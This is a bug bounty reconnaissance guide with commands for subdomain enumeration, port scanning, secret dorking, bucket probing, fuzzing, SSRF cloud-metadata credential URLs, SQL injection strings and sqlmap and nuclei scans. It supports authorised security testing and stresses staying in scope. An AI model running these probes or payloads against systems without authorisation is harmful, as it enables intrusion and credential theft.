Introduction
The cybersecurity community has repeatedly proven that proper reconnaissance is the difference between finding duplicate low-severity bugs and uncovering critical vulnerabilities worth thousands of dollars. Successful bug bounty hunters spend approximately 70% of their time on reconnaissance, not exploitation. This comprehensive guide explores the methodologies, tools, and strategies used by top researchers to discover vulnerabilities through systematic reconnaissance.
The Reconnaissance Mindset
Most security researchers fail not because they lack technical skills, but because they skip crucial reconnaissance phases. They rush into automated scanning, missing hidden assets like abandoned subdomains, forgotten acquisitions, misconfigured cloud storage, and exposed APIs. The bugs with the highest payouts often reside in assets that other hunters never discover.
Key Principles
- Passive reconnaissance should precede active testing - Gather maximum intelligence before sending any exploits
- Thoroughness beats speed initially - Comprehensive asset discovery leads to more unique findings
- Automation should enhance, not replace, manual analysis - Automated tools are force multipliers, not substitutes
- Context matters - Understanding what a company does helps identify likely vulnerability classes
Phase 1: Asset Discovery - Mapping the Attack Surface
1.1 Subdomain Enumeration
Most hunters only examine the primary domain, but the real goldmine lies in subdomains. Companies often have hundreds or thousands of subdomains, many forgotten or poorly maintained.
Essential Techniques:
Certificate Transparency Logs:
# Using crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u
# Using subfinder
subfinder -d target.com -o subdomains.txt
# Using amass
amass enum -passive -d target.com -o amass_results.txtDNS Enumeration:
# Using dnsgen for permutation
cat subdomains.txt | dnsgen - | massdns -r resolvers.txt -o S -w resolved.txt
# Using altdns for alterations
altdns -i subdomains.txt -o data_output -w words.txt -r -s results_output.txtShodan and Censys Integration:
These platforms index internet-connected devices and can reveal unexpected assets through certificate analysis, favicon hashes, and technology fingerprinting.
# Shodan query examples
ssl.cert.subject.cn:"target.com"
http.favicon.hash:HASH_VALUE
# Censys certificate search
# Navigate to censys.io and search for target domain
# Extract all certificate SANs (Subject Alternative Names)Key Strategy: Certificate-based queries frequently uncover IP addresses hosting multiple applications. Always verify whether discovered IPs fall within the bug bounty program scope before testing.
1.2 Acquisitions and Company Infrastructure Research
Autonomous System Number (ASN) Discovery:
Understanding a company's network infrastructure provides direct access to scanning opportunities.
# Using ipinfo.io
curl ipinfo.io/AS<ASN_NUMBER>
# Using hostinfo.io
# Query for network ranges associated with the target
# Scan discovered ranges
nmap -sV -T3 -Pn -p 2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443,19000,19080 target_rangeCorporate Research:
- Review SEC filings and investor relations pages for recent acquisitions
- Acquired companies often maintain separate infrastructure with different security postures
- Search for company mentions in news articles about partnerships or mergers
1.3 Historical Data Mining
Wayback Machine:
Deleted pages often contain vulnerabilities or sensitive information that developers thought was removed.
# Using waybackurls
waybackurls target.com | tee wayback_urls.txt
# Using gau (Get All URLs)
gau target.com | tee all_urls.txt
# Filter for interesting endpoints
cat wayback_urls.txt | grep -E "\.(js|json|xml|conf|config|bak|backup|swp|old|db|sql)"GitHub and Code Repository Scanning:
Developers frequently commit sensitive data to public repositories.
# GitHub dorking queries
org:target_org "api_key"
org:target_org "password"
org:target_org "secret"
org:target_org "token"
user:target_user "aws_access_key_id"
# Using tools
trufflehog --regex --entropy=True https://github.com/target/repo
gitleaks --repo-url=https://github.com/target/repoPastebin and Similar Services:
Search for:
- Database dumps
- Configuration files
- API credentials
- Internal documentation leaks
Phase 2: Technology Stack and Fingerprinting
2.1 Service Identification
# Port scanning with service detection
nmap -sV -sC -p- target.com -oA nmap_scan
# Fast port scanning with rustscan
rustscan -a target.com -- -A -sC
# HTTP technology fingerprinting
whatweb target.com
wappalyzer target.com2.2 JavaScript Analysis
JavaScript files contain treasure troves of information including API endpoints, authentication logic, and hidden functionality.
# Extract JS files
gospider -s https://target.com -c 10 -d 2 --js > js_files.txt
# Analyze JS for endpoints and secrets
cat js_files.txt | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u
# Using LinkFinder
python3 linkfinder.py -i https://target.com/app.js -o results.html
# Extract API endpoints
cat js_files.txt | grep -Eo "api/v[0-9]/[a-zA-Z0-9/_-]*"2.3 Cloud Storage Discovery
# AWS S3 buckets
aws s3 ls s3://target-company-name --no-sign-request
aws s3 ls s3://target-company-backups --no-sign-request
# Common bucket naming patterns
company-name-backups
company-name-logs
company-name-uploads
company-name-assets
company-name-prod
company-name-devGoogle Cloud Storage:
https://storage.googleapis.com/company-name-bucket/
Azure Blob Storage:
https://companyname.blob.core.windows.net/
Phase 3: Content Discovery and Endpoint Mapping
3.1 Directory and File Bruteforcing
# Using ffuf (Fast web fuzzer)
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301,302,403
# Using dirsearch
dirsearch -u https://target.com -e php,html,js,txt,zip -x 404,500
# Recursive discovery
feroxbuster -u https://target.com -w wordlist.txt -x js,php,txt,json -rHigh-Value Targets:
/admin,/admin-panel,/administrator/api,/api/v1,/api/v2/backup,/backups,/.backup/config,/.config,/configuration/debug,/test,/dev/graphql,/graphiql/.git,/.svn,/.env/swagger,/api-docs
3.2 Parameter Discovery
# Using Arjun
arjun -u https://target.com/endpoint
# Using ParamSpider
python3 paramspider.py --domain target.com
# Parameter mining from archived URLs
cat wayback_urls.txt | grep "?" | cut -d"?" -f2 | cut -d"=" -f1 | sort -u > parameters.txt3.3 Virtual Host Discovery
# Using ffuf for vhost discovery
ffuf -w vhosts.txt -u https://target.com -H "Host: FUZZ.target.com" -mc 200
# Manual testing
curl -H "Host: internal.target.com" https://target.comPhase 4: Vulnerability-Specific Reconnaissance
4.1 SSRF (Server-Side Request Forgery) Discovery
Look for functionality that:
- Fetches external URLs (webhooks, URL validation, PDF generators)
- Imports files from URLs
- Performs server-side rendering
- Integrates with external services
Common SSRF Endpoints:
/api/fetch?url=
/download?file=
/proxy?url=
/import?source=
/webhook?callback=
/pdf/generate?url=
Cloud Metadata Endpoints:
# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Google Cloud
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-014.2 XSS (Cross-Site Scripting) Reconnaissance
Identify Input Reflection Points:
# Using dalfox
dalfox url https://target.com/search?q=test
# Manual testing for reflection
echo "test123unique" | while read url; do
curl -s "$url" | grep -i "test123unique" && echo "Reflected: $url"
doneJavaScript Event Handlers: Look for user input in:
onclick,onerror,onloadattributes- JavaScript template literals
- DOM-based sinks:
innerHTML,document.write,eval
4.3 Authentication and Authorization Issues
Common Weak Points:
- Password reset functionality (token entropy, expiration)
- OAuth implementation (redirect_uri manipulation, state parameter)
- JWT tokens (algorithm confusion, weak secrets)
- API key exposure (client-side JavaScript, mobile apps)
CSRF Token Analysis:
# Test for CSRF vulnerabilities
# 1. Remove token completely
# 2. Use empty token value
# 3. Change POST to GET
# 4. Use another user's token
# 5. Use same token for multiple accounts4.4 IDOR (Insecure Direct Object Reference) Hunting
High-Value Endpoints:
/api/user/{id}
/profile/{username}
/document/{document_id}
/invoice/{invoice_id}
/order/{order_id}
Testing Methodology:
- Create two test accounts
- Identify sequential or guessable identifiers
- Attempt cross-account access
- Test with modified UUIDs (if predictable patterns exist)
4.5 SQL Injection Recon
Parameter Identification:
# Using sqlmap for initial detection
sqlmap -u "https://target.com/page?id=1" --batch --random-agent
# Manual testing
' OR '1'='1
" OR "1"="1
1' ORDER BY 1--
1' UNION SELECT NULL--Error-Based Discovery: Intentionally trigger errors to leak database information:
' (single quote)
" (double quote)
\ (backslash)
; (semicolon)
Phase 5: Advanced Reconnaissance Techniques
5.1 Mobile Application Analysis
APK/IPA Extraction:
# Decompile Android APK
apktool d application.apk -o output_directory
# Extract strings for URLs and API keys
strings application.apk | grep -E "(http|https|api|key|token)"
# Using MobSF
# Upload APK to Mobile Security Framework for automated analysis5.2 API Reconnaissance
API Documentation Discovery:
/swagger.json,/swagger-ui/api/docs,/api-docs/openapi.json/graphql,/graphiql
GraphQL Introspection:
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
types {
name
fields {
name
type {
name
kind
}
}
}
}
}5.3 Automated Vulnerability Scanning
While automation shouldn't be your primary method, it's effective for newly discovered assets.
# Using nuclei with custom templates
nuclei -l targets.txt -t nuclei-templates/ -severity critical,high
# Custom template groups
nuclei -l targets.txt -t nuclei-templates/cves/
nuclei -l targets.txt -t nuclei-templates/exposures/
# Using httpx for quick probing
cat subdomains.txt | httpx -silent -status-code -title -tech-detect -o probed.txtPhase 6: Organization and Tracking
6.1 Documentation Strategy
Maintain detailed records of:
- Discovered assets and their status (in-scope/out-of-scope)
- Technologies identified on each asset
- Interesting parameters and endpoints
- Potential vulnerabilities noted
- Attack surface changes over time
Recommended Tools:
- Notion or Obsidian for note-taking
- Excel/Google Sheets for asset tracking
- Burp Suite project files for HTTP history
- Screenshots for evidence preservation
6.2 Continuous Monitoring
#!/bin/bash
TARGET="target.com"
OLD_SUBS="old_subdomains.txt"
NEW_SUBS="new_subdomains.txt"
# Run subdomain enumeration
subfinder -d $TARGET -silent | sort -u > $NEW_SUBS
# Compare with previous results
diff $OLD_SUBS $NEW_SUBS | grep ">" | cut -d" " -f2 > new_findings.txt
# Notify if new subdomains found
if [ -s new_findings.txt ]; then
echo "New subdomains discovered:"
cat new_findings.txt
fi
# Update old file
cp $NEW_SUBS $OLD_SUBSCommon Pitfalls and How to Avoid Them
1. Tool Over-Reliance
Problem: Running automated scanners without understanding targets leads to duplicates. Solution: Use automation to supplement manual analysis, not replace it.
2. Insufficient Scope Understanding
Problem: Testing out-of-scope assets wastes time and can cause legal issues. Solution: Always verify scope before testing. Maintain an updated scope document.
3. Surface-Level Recon
Problem: Only checking obvious assets misses hidden vulnerabilities. Solution: Dedicate 70% of time to reconnaissance. Go several layers deep.
4. Poor Time Management
Problem: Spending too long on one aspect while neglecting others. Solution: Create a structured checklist and allocate time proportionally.
5. Inadequate Documentation
Problem: Forgetting what was already tested or losing track of findings. Solution: Document everything in real-time. Create reproducible testing notes.
Practical Workflow Example
Here's a condensed workflow for approaching a new target:
# Day 1: Initial Asset Discovery (4-6 hours)
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com -o amass_subs.txt
cat subs.txt amass_subs.txt | sort -u | httpx -silent > live_subs.txt
# Day 2: Deep Enumeration (4-6 hours)
cat live_subs.txt | nuclei -t nuclei-templates/exposures/ -severity medium,high,critical
gospider -S live_subs.txt -c 10 -d 3 --js -o spider_results
waybackurls target.com | tee wayback.txt
# Day 3: Technology and Endpoint Mapping (4-6 hours)
cat live_subs.txt | while read url; do
whatweb $url
ffuf -w wordlist.txt -u $url/FUZZ -mc 200,301,403 -o ffuf_$url.txt
done
# Day 4: Manual Testing Focus (6-8 hours)
# Focus on interesting findings from previous days
# Test authentication mechanisms
# Analyze JavaScript files
# Check for business logic flaws
# Ongoing: Continuous Monitoring
# Set up cron jobs for subdomain monitoring
# Subscribe to bug bounty program updates
# Track new features and changesAdvanced Tips from Top Researchers
- Focus on Acquisitions: Recently acquired companies often have integration issues and forgotten infrastructure.
- Monitor Certificate Transparency Logs: Set up alerts for new certificates issued for your target domains.
- Analyze Competitors: If multiple programs exist in the same industry, reconnaissance on one can inform testing on another.
- Study Past Disclosed Reports: Public bug bounty reports reveal what worked. Learn from others' techniques.
- Build Custom Wordlists: Generic wordlists miss context-specific endpoints. Create industry and company-specific lists.
- Test Edge Cases: Unconventional inputs often bypass security controls (Unicode, null bytes, long inputs).
- Correlation is Key: A low-severity finding combined with another can become critical (CSRF + account takeover).
Conclusion
Effective reconnaissance is not about running the most tools or spending the longest time. It's about systematic, thoughtful information gathering that uncovers assets and vulnerabilities others miss. The researchers finding critical bugs worth thousands of dollars aren't necessarily more skilled at exploitation; they're better at reconnaissance.
Success in bug bounty hunting comes from:
- Patience - Thorough recon takes time but pays off
- Methodology - Systematic approaches prevent oversight
- Persistence - Keep digging when others stop
- Creativity - Think beyond automated tools
- Documentation - Track everything for future reference
Remember that reconnaissance is an iterative process. As applications evolve, new assets appear, and security postures change. Continuous monitoring and re-reconnaissance of previously tested targets can yield new findings.
The difference between a mediocre bug bounty hunter and a top performer is often just reconnaissance depth. Master this phase, and the exploitation becomes significantly easier.
Resources for Further Learning
Tools:
- Subfinder, Amass (subdomain enumeration)
- httpx, nuclei (HTTP probing and scanning)
- ffuf, feroxbuster (content discovery)
- Burp Suite (web application testing)
- git-secrets, trufflehog (credential scanning)
Platforms:
- HackerOne, Bugcrowd (bug bounty platforms)
- Shodan, Censys (internet-wide scanning)
- crt.sh (certificate transparency logs)
- GitHub, GitLab (code repository searching)
Communities:
- Twitter #bugbountytips
- Reddit r/bugbounty
- Discord bug bounty servers
- Conference talks (DEF CON, Black Hat, BSides)
Start with one target, follow this methodology systematically, and document your process. Over time, you'll develop intuition for where vulnerabilities hide and build your own enhanced reconnaissance workflow.